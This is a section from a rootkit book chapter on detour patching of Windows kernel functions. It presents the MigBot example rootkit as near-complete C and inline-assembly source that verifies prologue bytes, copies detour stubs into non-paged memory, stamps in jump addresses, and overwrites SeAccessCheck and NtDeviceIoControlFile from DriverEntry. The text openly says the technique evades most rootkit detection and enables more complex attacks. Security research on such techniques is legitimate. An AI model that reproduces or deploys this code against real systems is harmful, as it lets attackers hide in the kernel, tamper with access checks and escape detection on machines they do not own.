Detour Patching | Rootkits: Subverting the Windows Kernel


In Chapter 4, we saw the power of using call hooks as a convenient way to modify program behavior. One downside of the call hook is that it modifies call tables, and this can be detected by anti-virus and anti-rootkit technology. A subtler approach to the problem is to patch the bytes within the function itself by inserting a jump into rootkit code. Additionally, modifying just a single function can affect multiple tables pointing to that function, without the need to keep track of all the tables that point to the function. This technique is called detour patching, and can be used to reroute the control flow around a function.

Figure 5-1 illustrates how code is inserted by the rootkit into the control flow.

Figure 5-1. Modification of control flow.

As with a call hook, we can insert rootkit code to modify arguments before and after a system call or function call. We can also make the original function call as if it had never been patched. Finally, we can rewrite the logic of the function call altogether. For example, we can make the call always return a certain error code.

Detour patching is best illustrated by example. The technique requires several steps, which are detailed in the following sections.

Rerouting the Control Flow Using MigBot

MigBot is an example rootkit that illustrates detour patches on kernel functions.

Rootkit.com

MigBot can be downloaded from rootkit.com at: www.rootkit.com/vault/hoglund/migbot.zip

MigBot reroutes the control flow from two important kernel functions: NtDeviceIoControlFile and SeAccessCheck.

Rerouting a function requires first finding the function in memory. An advantage of the two functions we have chosen is that they are exported. This makes them easier to locate, because there is a table in the PE header where we can perform a lookup to find them. In the code for MigBot, we simply refer to the functions by their exported names. Because they are exported, there is no need to hunt through PE headers and such.^[1]

^[1] The technique of hunting through PE headers is covered in Chapters 4 and 10.

It is more involved to patch a function that is not exported: It may require searching memory for unique byte sequences in order to find the desired function.

Once we have a pointer to the function, the next step is to know exactly what we're overwriting. Changing opcodes in memory is destructive. If you install a far jump, you will overwrite at least 7 bytes of memory, destroying any instructions that previously existed there. Later, you will need to recreate the logic or restore those instructions somehow.

Instruction alignment is also a problem (especially with the Intel x86 instruction set). Not all instructions are of the same length. For example, a PUSH instruction might be only one byte long, and a JMP instruction might be seven bytes long!

In our example, we wish to overwrite seven bytes of data, but the instructions we will be overwriting take up more than seven bytes of space. Therefore, if we patch only the seven bytes, we leave in place a half-bitten chunk of the last instruction we overwrite: a "crumb," if you will. That partial instruction is nothing but corruption at this point. If the CPU tries to execute it, the bytes will be misinterpreted; in other words, the system will most likely crash, and the user will see a Blue Screen of Death.

Leaving a crumb behind, then, would really mess things up. To avoid this, you must NOP out any crumbs that are left behind. In other words, you must overwrite up to the next instruction boundary. It's a Good Thing that the NOP (opcode 0x90) is only one byte long; this makes it very easy to patch out code bytes one at a time. The one-byte NOP has long been used for exactly this kind of code patching (in other words, Someone Who Came Before Us Thought of This).

Figure 5-2 illustrates the overwrite process. The new instruction, a far jmp, is inserted along with two NOP instructions in order to pad out the patch without leaving a "crumb" behind.

Figure 5-2. Procedure for code patching.
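The padding arithmetic can be sketched in a few lines of ordinary user-mode C. This is only an illustration on a plain byte buffer, not part of MigBot: the helper names patch_length and pad_with_nops are hypothetical, and the instruction lengths are assumed to have been read off a disassembly by hand.

```c
#include <stddef.h>
#include <string.h>

#define FAR_JMP_LEN 7    /* opcode 0xEA + 4-byte offset + 2-byte selector */
#define NOP_OPCODE  0x90

/*
 * Given the lengths of the instructions at the start of a function
 * (read by hand from a disassembler), return how many bytes must be
 * overwritten so that the patch ends on an instruction boundary.
 * Returns 0 if the listed instructions do not cover the 7-byte jump.
 */
size_t patch_length(const size_t *insn_len, size_t count)
{
    size_t total = 0;
    for (size_t i = 0; i < count; i++) {
        total += insn_len[i];
        if (total >= FAR_JMP_LEN)
            return total;
    }
    return 0;
}

/*
 * Fill everything after the 7-byte jump in a patch buffer with NOPs,
 * so that no partial instruction (a "crumb") is left behind.
 */
void pad_with_nops(unsigned char *patch, size_t patch_len)
{
    if (patch_len > FAR_JMP_LEN)
        memset(patch + FAR_JMP_LEN, NOP_OPCODE, patch_len - FAR_JMP_LEN);
}
```

For the SeAccessCheck prologue shown later in this section, the instruction lengths are 1, 2, 1, 2, and 3 bytes, so patch_length returns 9 and two NOPs are needed. For NtDeviceIoControlFile the lengths are 1, 2, 2, and 3, giving 8 bytes and a single NOP.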

To successfully patch over instructions without causing corruption, it is also necessary to ensure that the patch is applied to the correct version and location in memory. This step requires special attention because the target software may be patched, or different versions of the code may exist. If we don't perform some sanity checking, we may patch the wrong version, causing corruption and crashes.

Checking for Function Bytes

Before we overwrite a function with a jump, we need to perform various checks to make sure the function is the one we expect it to be. Verifying that it has the same name, for example, is not sufficient: What if the OS is a different version of Windows ("home" versus "professional" edition, for example) than the one for which the rootkit was written? Or, what if a service pack has been installed and has changed the function? It is even possible that another program has already set up camp and patched the function before us. Modifying the code bytes of the function without first checking to ensure that the function is as expected could result in corruption and a subsequent Blue Screen of Death.

MigBot includes two steps for checking function bytes. The first retrieves a pointer to the function, and the second performs a simple byte comparison to a hard-coded value we expect to find there. You can determine what bytes are there by using SoftIce or another kernel debugger, or by disassembling the binary with a tool such as IDA Pro.

Make sure you keep track of the length of the byte sequence being tested. Notice in the following code that one sequence is 8 bytes long, and the other is 9 bytes long:

    NTSTATUS CheckFunctionBytesNtDeviceIoControlFile()
    {
        int i=0;
        char *p = (char *)NtDeviceIoControlFile;
        //The beginning of the NtDeviceIoControlFile function
        //should match:
        //55      PUSH EBP
        //8BEC    MOV  EBP, ESP
        //6A01    PUSH 01
        //FF752C  PUSH DWORD PTR [EBP + 2C]
        char c[] = { 0x55, 0x8B, 0xEC, 0x6A, 0x01, 0xFF, 0x75, 0x2C };
        while(i<8)
        {
            DbgPrint(" - 0x%02X ", (unsigned char)p[i]);
            if(p[i] != c[i])
            {
                return STATUS_UNSUCCESSFUL;
            }
            i++;
        }
        return STATUS_SUCCESS;
    }

    NTSTATUS CheckFunctionBytesSeAccessCheck()
    {
        int i=0;
        char *p = (char *)SeAccessCheck;
        //The beginning of the SeAccessCheck function
        //should match:
        //55      PUSH EBP
        //8BEC    MOV  EBP, ESP
        //53      PUSH EBX
        //33DB    XOR  EBX, EBX
        //385D24  CMP  [EBP+24], BL
        char c[] = { 0x55, 0x8B, 0xEC, 0x53, 0x33, 0xDB, 0x38, 0x5D, 0x24 };
        while(i<9)
        {
            DbgPrint(" - 0x%02X ", (unsigned char)p[i]);
            if(p[i] != c[i])
            {
                return STATUS_UNSUCCESSFUL;
            }
            i++;
        }
        return STATUS_SUCCESS;
    }
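One way to avoid tracking the sequence lengths by hand is to let the compiler compute them with sizeof. The following is a minimal user-mode sketch of that idea, assuming the expected bytes from the listings above. The helper prologue_matches and the macro PROLOGUE_MATCHES are hypothetical names that do not appear in MigBot, and the comparison runs against an ordinary buffer.

```c
#include <stddef.h>
#include <string.h>

/* Expected prologue bytes, copied from the two listings above. */
static const unsigned char expected_ntdeviceiocontrolfile[] = {
    0x55, 0x8B, 0xEC, 0x6A, 0x01, 0xFF, 0x75, 0x2C
};
static const unsigned char expected_seaccesscheck[] = {
    0x55, 0x8B, 0xEC, 0x53, 0x33, 0xDB, 0x38, 0x5D, 0x24
};

/* Returns 1 if the first len bytes at code equal expected, else 0. */
int prologue_matches(const void *code,
                     const unsigned char *expected, size_t len)
{
    return memcmp(code, expected, len) == 0;
}

/*
 * Convenience wrapper: the length comes from the array itself, so the
 * 8-versus-9 bookkeeping cannot drift out of step with the byte list.
 * Only valid when expected is an array, not a pointer.
 */
#define PROLOGUE_MATCHES(code, expected) \
    prologue_matches((code), (expected), sizeof(expected))
```

With this arrangement, adding or removing a byte from an expected sequence changes the comparison length automatically, so the hard-coded loop bounds of 8 and 9 are no longer needed.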

Keeping Track of the Overwritten Instructions

Once you overwrite these instructions with your patch, the instructions are gone! But consider that these instructions do something important: they modify the stack and set up some registers. If we later wish to run the original function, we will need to execute the missing instructions.

Since we know exactly what instructions we removed, we can store them in another location and execute them before branching back to the original function. Figure 5-3 illustrates this technique.

Figure 5-3. Executing the removed instructions.

After the detour has taken place, MigBot simply branches back to the original function. This is a template you can use to insert whatever code you choose.

The rootkit code is written as a function, but the function is declared as "naked." This prevents the compiler from putting any extra opcodes into the function. This is important, since we don't want to corrupt the stack or any registers. You can see in the following code that the missing instructions are executed, and then a far jump takes place.

Of special note is the technique used to code the far jump. Since the author could not figure out the syntax for a far jump using the DDK compiler, he instead used the _emit pseudoinstruction to force bytes to be output. This is a useful technique not just for encoding an obscure instruction, but also for self-modifying code and hard-inserted strings.

    // Naked functions have no prolog/epilog code;
    // they are functionally like the
    // target of a goto statement.
    __declspec(naked) void my_function_detour_seaccesscheck()
    {
        __asm
        {
            // exec missing instructions
            push  ebp
            mov   ebp, esp
            push  ebx
            xor   ebx, ebx
            // The original bytes are 38 5D 24, so the displacement
            // is hexadecimal 24; inline assembler constants are
            // decimal unless prefixed with 0x.
            cmp   [ebp+0x24], bl
            // Jump to reentry location in hooked function.
            // This gets "stamped" with the correct address
            // at runtime.
            //
            // We need to hard-code a far jmp, but the assembler
            // that comes with the DDK will not assemble this out
            // for us, so we code it manually.
            // jmp FAR 0x08:0xAAAAAAAA
            _emit 0xEA
            _emit 0xAA
            _emit 0xAA
            _emit 0xAA
            _emit 0xAA
            _emit 0x08
            _emit 0x00
        }
    }

    // We read this function into non-paged memory
    // before we place the detour. It seems that the
    // driver code gets paged now and then, which is bad
    // for children and other living things.
    __declspec(naked) void my_function_detour_ntdeviceiocontrolfile()
    {
        __asm
        {
            // exec missing instructions
            push  ebp
            mov   ebp, esp
            push  0x01
            push  dword ptr [ebp+0x2C]
            // Jump to reentry location in hooked function.
            // This gets "stamped" with the correct address
            // at runtime.
            //
            // We need to hard-code a far jmp, but the assembler
            // that comes with the DDK will not assemble this out
            // for us, so we code it manually.
            // jmp FAR 0x08:0xAAAAAAAA
            _emit 0xEA
            _emit 0xAA
            _emit 0xAA
            _emit 0xAA
            _emit 0xAA
            _emit 0x08
            _emit 0x00
        }
    }

Using NonPagedPool Memory

The code for your rootkit function resides in your driver memory. However, it does not need to stay there. Especially if your driver is going to be pageable, your rootkit code needs to be moved into a location where it will never be paged out. This is NonPagedPool memory. An interesting added benefit is that once the rootkit code has been placed in NonPagedPool, the driver itself can be unloaded, as the rootkit driver must be loaded only long enough to apply the patch. The MigBot example uses NonPagedPool to store rootkit code, as does the jump-template technique detailed later in this chapter.

Runtime Address Fixups

You will notice in the following code that we have FAR JMP instructions that jump to the addresses 0xAAAAAAAA and 0x11223344. These values are clearly not valid, but this is on purpose. The values are to be replaced with valid addresses when the patch is placed. These values cannot be hard coded because they change at runtime. The rootkit can determine the correct addresses needed, and can "stamp in" the correct values at runtime.

    VOID DetourFunctionSeAccessCheck()
    {
        char *actual_function = (char *)SeAccessCheck;
        char *non_paged_memory;
        unsigned long detour_address;
        unsigned long reentry_address;
        int i = 0;

The following code will be written over the original instructions. Note the use of the NOP instructions to pad out the distance:

        // Assembles to jmp far 0008:11223344 where 11223344
        // is the address of our detour function, plus two NOPs
        // to align the patch.
        char newcode[] = { 0xEA, 0x44, 0x33, 0x22, 0x11,
                           0x08, 0x00, 0x90, 0x90 };

Now a reentry address is calculated. This is the address in the original function that immediately follows the patched location. Notice that we add 9 (the length of the patch) to the function pointer to obtain this address:

        // Reentering the hooked function at a location past the
        // overwritten opcodes; alignment is, of course, very
        // important here.
        reentry_address = ((unsigned long)SeAccessCheck) + 9;

Now some NonPagedPool is allocated, enough to store the rootkit code. Next, the rootkit code is copied into the newly allocated memory. The detour patch will then branch to this new code location. The contents of the rootkit code (the naked function we declared earlier) are copied, byte for byte, into the NonPagedPool memory. The pointer to the beginning of this new copy of the function is stored.

        non_paged_memory = ExAllocatePool(NonPagedPool, 256);
        // Copy contents of our function into non-paged memory
        // with a cap at 256 bytes.
        // (Beware of possible read off end of page FIXME.)
        for(i=0;i<256;i++)
        {
            ((unsigned char *)non_paged_memory)[i] =
                ((unsigned char *)my_function_detour_seaccesscheck)[i];
        }
        detour_address = (unsigned long)non_paged_memory;

Now it's time for a little magic. The address of our new copy of the rootkit function is placed into the patch, so the patch will properly FAR JMP to the rootkit code instead of to 0x11223344:

        // stamp in the target address of the far jmp
        *( (unsigned long *)(&newcode[1]) ) = detour_address;
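To make the byte layout of the patch explicit, here is a small user-mode sketch that builds the same seven bytes into an ordinary array. The function name encode_far_jmp is hypothetical and is not part of MigBot. It writes each byte individually, so it does not depend on the host's byte order or on unaligned pointer casts.

```c
#include <stdint.h>

#define FAR_JMP_LEN 7

/*
 * Write the encoding of "jmp far selector:offset" into out[0..6]:
 *   out[0]    = 0xEA, the far-jump opcode
 *   out[1..4] = 32-bit offset, least significant byte first
 *   out[5..6] = 16-bit segment selector, least significant byte first
 */
void encode_far_jmp(unsigned char out[FAR_JMP_LEN],
                    uint32_t offset, uint16_t selector)
{
    out[0] = 0xEA;
    out[1] = (unsigned char)(offset & 0xFF);
    out[2] = (unsigned char)((offset >> 8) & 0xFF);
    out[3] = (unsigned char)((offset >> 16) & 0xFF);
    out[4] = (unsigned char)((offset >> 24) & 0xFF);
    out[5] = (unsigned char)(selector & 0xFF);
    out[6] = (unsigned char)((selector >> 8) & 0xFF);
}
```

Calling encode_far_jmp with offset 0x11223344 and selector 0x0008 produces EA 44 33 22 11 08 00, which is the placeholder sequence at the start of newcode. This is why the address is stamped in starting at newcode[1].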

Again, another address fixup: This time, in the rootkit code we search for the 0xAAAAAAAA address. When we find it, we replace it with the reentry address calculated earlier. Again, this is the address in the original function that immediately follows the patched location.

        // Now, "stamp in" the return jmp into our
        // detour function:
        for(i=0;i<200;i++)
        {
            if( (0xAA == ((unsigned char *)non_paged_memory)[i]) &&
                (0xAA == ((unsigned char *)non_paged_memory)[i+1]) &&
                (0xAA == ((unsigned char *)non_paged_memory)[i+2]) &&
                (0xAA == ((unsigned char *)non_paged_memory)[i+3]))
            {
                // we found the address 0xAAAAAAAA
                // stamp it w/ the correct address
                *( (unsigned long *)(&non_paged_memory[i]) ) =
                    reentry_address;
                break;
            }
        }
        // TODO, raise IRQL
        // Overwrite the bytes in the kernel function
        // to apply the detour jmp.
        for(i=0;i < 9;i++)
        {
            actual_function[i] = newcode[i];
        }
        // TODO, drop IRQL
    }

    // The same logic is applied to the NtDeviceIoControlFile patch:
    VOID DetourFunctionNtDeviceIoControlFile()
    {
        char *actual_function = (char *)NtDeviceIoControlFile;
        char *non_paged_memory;
        unsigned long detour_address;
        unsigned long reentry_address;
        int i = 0;
        // Assembles to jmp far 0008:11223344 where 11223344
        // is the address of our detour function, plus one NOP
        // to align the patch.
        char newcode[] = { 0xEA, 0x44, 0x33, 0x22, 0x11,
                           0x08, 0x00, 0x90 };
        // Reentering the hooked function at a location past
        // the overwritten opcodes; alignment is, of course,
        // very important here.
        reentry_address = ((unsigned long)NtDeviceIoControlFile) + 8;
        non_paged_memory = ExAllocatePool(NonPagedPool, 256);
        // Copy contents of our function into non-paged memory
        // with a cap at 256 bytes (beware of possible read
        // off end of page FIXME).
        for(i=0;i<256;i++)
        {
            ((unsigned char *)non_paged_memory)[i] =
                ((unsigned char *)my_function_detour_ntdeviceiocontrolfile)[i];
        }
        detour_address = (unsigned long)non_paged_memory;
        // Stamp in the target address of the far jmp.
        *( (unsigned long *)(&newcode[1]) ) = detour_address;
        // Now, stamp in the return jmp into our
        // detour function.
        for(i=0;i<200;i++)
        {
            if( (0xAA == ((unsigned char *)non_paged_memory)[i]) &&
                (0xAA == ((unsigned char *)non_paged_memory)[i+1]) &&
                (0xAA == ((unsigned char *)non_paged_memory)[i+2]) &&
                (0xAA == ((unsigned char *)non_paged_memory)[i+3]))
            {
                // We found the address 0xAAAAAAAA;
                // stamp it with the correct address.
                *( (unsigned long *)(&non_paged_memory[i]) ) =
                    reentry_address;
                break;
            }
        }
        // TODO, raise IRQL
        // Overwrite the bytes in the kernel function
        // to apply the detour jmp.
        for(i=0;i < 8;i++)
        {
            actual_function[i] = newcode[i];
        }
        // TODO, drop IRQL
    }
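The placeholder search used in both functions can also be sketched on its own, on a plain byte buffer in user mode. The helper below is hypothetical (stamp_placeholder is not a MigBot function). It differs from the loops above in two ways that are assumptions of this sketch: it bounds the search by the buffer length rather than a fixed 200, and it reports whether the placeholder was found.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Search buf[0..len) for the first occurrence of a 4-byte placeholder
 * and overwrite it with value. Both are stored least significant byte
 * first, as on x86. Returns the offset of the match, or -1 if the
 * placeholder does not occur in the buffer.
 */
long stamp_placeholder(unsigned char *buf, size_t len,
                       uint32_t placeholder, uint32_t value)
{
    unsigned char pat[4];
    unsigned char val[4];

    for (int b = 0; b < 4; b++) {
        pat[b] = (unsigned char)((placeholder >> (8 * b)) & 0xFF);
        val[b] = (unsigned char)((value >> (8 * b)) & 0xFF);
    }

    /* i + 4 <= len keeps every 4-byte comparison inside the buffer. */
    for (size_t i = 0; i + 4 <= len; i++) {
        if (memcmp(buf + i, pat, 4) == 0) {
            memcpy(buf + i, val, 4);
            return (long)i;
        }
    }
    return -1;
}
```

Returning the offset lets the caller tell a successful fixup from a missing placeholder. The original loops do not make that distinction: if 0xAAAAAAAA is never found, they fall through silently and leave the invalid address in place.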

The DriverEntry routine simply checks for the correct function bytes and then applies the detour patches:

    NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject,
                          IN PUNICODE_STRING theRegistryPath )
    {
        DbgPrint("My Driver Loaded!");
        if(STATUS_SUCCESS != CheckFunctionBytesNtDeviceIoControlFile())
        {
            DbgPrint("Match Failure on NtDeviceIoControlFile!");
            return STATUS_UNSUCCESSFUL;
        }
        if(STATUS_SUCCESS != CheckFunctionBytesSeAccessCheck())
        {
            DbgPrint("Match Failure on SeAccessCheck!");
            return STATUS_UNSUCCESSFUL;
        }
        DetourFunctionNtDeviceIoControlFile();
        DetourFunctionSeAccessCheck();
        return STATUS_SUCCESS;
    }

You have now learned a powerful technique of detour patching. The example code has given you the basic tools required to use this technique. From these basic tools, you can craft more-complex attacks and modifications against code. The technique is very strong, and can easily evade most rootkit-detection technologies.

The next section will detail a slightly different way to use code patches in order to hook the interrupt table.
